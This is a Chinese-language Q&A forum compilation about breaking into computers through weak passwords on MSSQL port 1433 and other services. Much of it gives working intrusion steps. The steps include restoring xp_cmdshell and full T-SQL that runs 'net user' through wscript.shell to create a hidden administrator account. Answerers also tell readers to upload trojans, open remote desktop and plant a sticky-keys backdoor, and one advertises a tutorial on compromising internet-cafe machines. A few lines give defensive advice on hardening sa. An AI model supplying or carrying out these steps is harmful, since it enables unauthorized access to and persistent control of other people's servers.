1433端口扫描出sa弱口令后怎么传文件啊,我用SQL综合利用工具传,无论什么文件显示上传成功,但是DIR C:\
换个方法 首先用S 扫描器 扫面开放1433端口的IP 然后修正
然后使用X-SCAn 设置好...然后点开始...等出有漏洞的服务器呗~~~~~
扫出了就用SQL Tools 连接 首先看看能不能执行DOS命令
能的话最快速度上传马马然后爽去呗~~~不能执行DOS会有提示的
按照提示参考一下
一.更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'
(提示:慎用!)二.简单修补sa弱口令:方法1:查询分离器连接后执行:if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO然后按F5键命令执行完毕。方法2:查询分离器连接后第一步执行:use master,第二步执行:sp_dropextendedproc 'xp_cmdshell',然后按F5键命令执行完毕。
三.常见情况恢复执行xp_cmdshell:1 未能找到存储过程'master..xpcmdshell'。恢复方法:查询分离器连接后,第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',然后按F5键命令执行完毕。2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)恢复方法:查询分离器连接后,第一步执行:sp_dropextendedproc "xp_cmdshell",第二步执行:sp_addextendedproc 'xp_cmdshell','xpsql70.dll'然后按F5键命令执行完毕。3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)恢复方法:查询分离器连接后,第一步执行:exec sp_dropextendedproc 'xp_cmdshell'第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'然后按F5键命令执行完毕。四.终极方法:如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:查询分离器连接后,2000servser系统:declare @shell int exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'xp或2003server系统:declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
干这个不好...
把扫出的ip整理好导入X-scan,选择扫描SQL弱口令,设置字典(默认的基本被扫光了,自己想想),然后开始扫描
扫描到弱口令拿SQL利用工具连接,执行CMD命令,传马,开3389,留后门,搞定了
这个端口可以说的并不多,但是网上存在很多抓1433端口肉鸡的动画。
而他们利用的往往是sa弱口令,因此我们要注意sa密码设置的要复杂一些,而且在conn等数据库链接文件中不要使用sa用户进行数据库连接。
另外1433端口,如果你仅仅是本机web链接本机数据库,那么没必要开1433.他是远程链接使用的。
呵…没用的软件…能用dos不能上传文件…用dos提升管理员…开共享…在用啊D进去…也可以用啊D开TELNET…不懂加Q:250278209…还有空间里有我用1433入侵网吧的教程…密码:110120119
你可以直接开的telnet服务,然后telnet到他的电脑,就可用ftp下载了 也可开他得3389
留一个shift后门就ok 不用账户登录就可以
mysql扫描出弱口令为什么登录不了
答:1. 检查MySQL服务是否启动dows上,你可以通过下面的步骤来检查MySQL服务是否启动:+R键,打开运行窗口。sc,然后按下回车键。c. 找到MySQL服务,检查它的状态是否为“正在运行”。dows上,你可以右键点击MySQL服务,然后选择“启动”。2. 检查MySQL端口是否被占用 如果MySQL服务已经启动,但是你仍然无法登录...
135端口问题
答:135端口扫描工具: X-way2.5 (可用其他IP扫描工具) 下载地址 http://www.namipan.com/d/12612bf006209638fd0f24c542d667510cf73c99c87b0e00 IP整理工具 : 黑色旋风IP(可用其他IP整理工具) 下载地址http://www.namipan.com/d/3dc16412541ee553a222abc64f48075022c981d3c35e0300 弱口令筛选工具 : ntscan10...
常见端口入侵
答:现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。2:4899端口入侵 用4899过滤器.exe,扫描空口令的机器 ...
用扫描器扫描一个网段的NT-server弱口令怎么扫不到?按理说家庭用户的...
答:现在XP的漏洞很少,X-SCAN扫描的是135。139端口,被防火墙或补丁屏蔽了。现在很少人用X-SCAN。
如何穿透ADSL路由入侵内网-搜狗输入法
答:http://pinyin.37moyu.com/ 穿透ADSL路由入侵内网方法:1.扫描现在很多ADSL MODEM都是通过80 23 21三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是选择了23端口,打开SUPPERSCAN,填上所在地区的IP段,跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开...
为什么弱口令扫描不到啊
答:假如电脑有装防火墙一般大部分弱口令都可以封住了,不过你这样的情况,你应该不是和其它电脑是经过交换机或者路由器链接的吧~如果是这样,可能是某一个交换机或者路由器上带有防火墙功能。
facan扫出了oracle的弱口令为什么连接不上
答:如果facan扫描出了Oracle数据库的弱口令,但无法连接上数据库,可能有以下几个原因导致:1. 弱口令已被更改:可能在facan扫描后,数据库管理员或系统管理员已经发现了弱口令的存在,并及时更改了该口令。因此,你使用扫描得到的弱口令无法连接到数据库。2. 用户名错误:除了口令错误外,还有可能是你输入...
如何扫描win7 smb的弱口令
答:首先进行信息踩点,判断对方ip类型是不是内网,是外网的继续往下看,进行扫描,推荐使用X-Scan和Super_Scan,扫描漏洞、端口、弱口令等信息,如果扫出来那就恭喜了,直接杀进去,剩下的,你懂得,如果没扫出来漏洞继续看,尝试DOS入侵,使用talent等命令尝试连接,或者用ping的溢出漏洞尝试攻击。
为什么我的NTscan扫描器 扫描不到弱口令 ,总是显示 ;如图
答:查看开启了哪些服务)等等吧,这些都是些基本的命令,大家可以去学习一下。扫不出若口 令
如何获取监控系统的网络范围和弱口令?
答:1. 首先,您需要获取目标监控系统的网络范围,这通常涉及对内网进行扫描以确定IP地址和开放的端口。2. 接下来,对检测到的开放端口进行分析,寻找可能存在的安全漏洞,特别是那些默认或弱密码。3. 一旦发现弱口令,可以尝试利用这些弱口令登录到DVR(数字视频录像机)设备。4. 在成功登录DVR后,记录下...
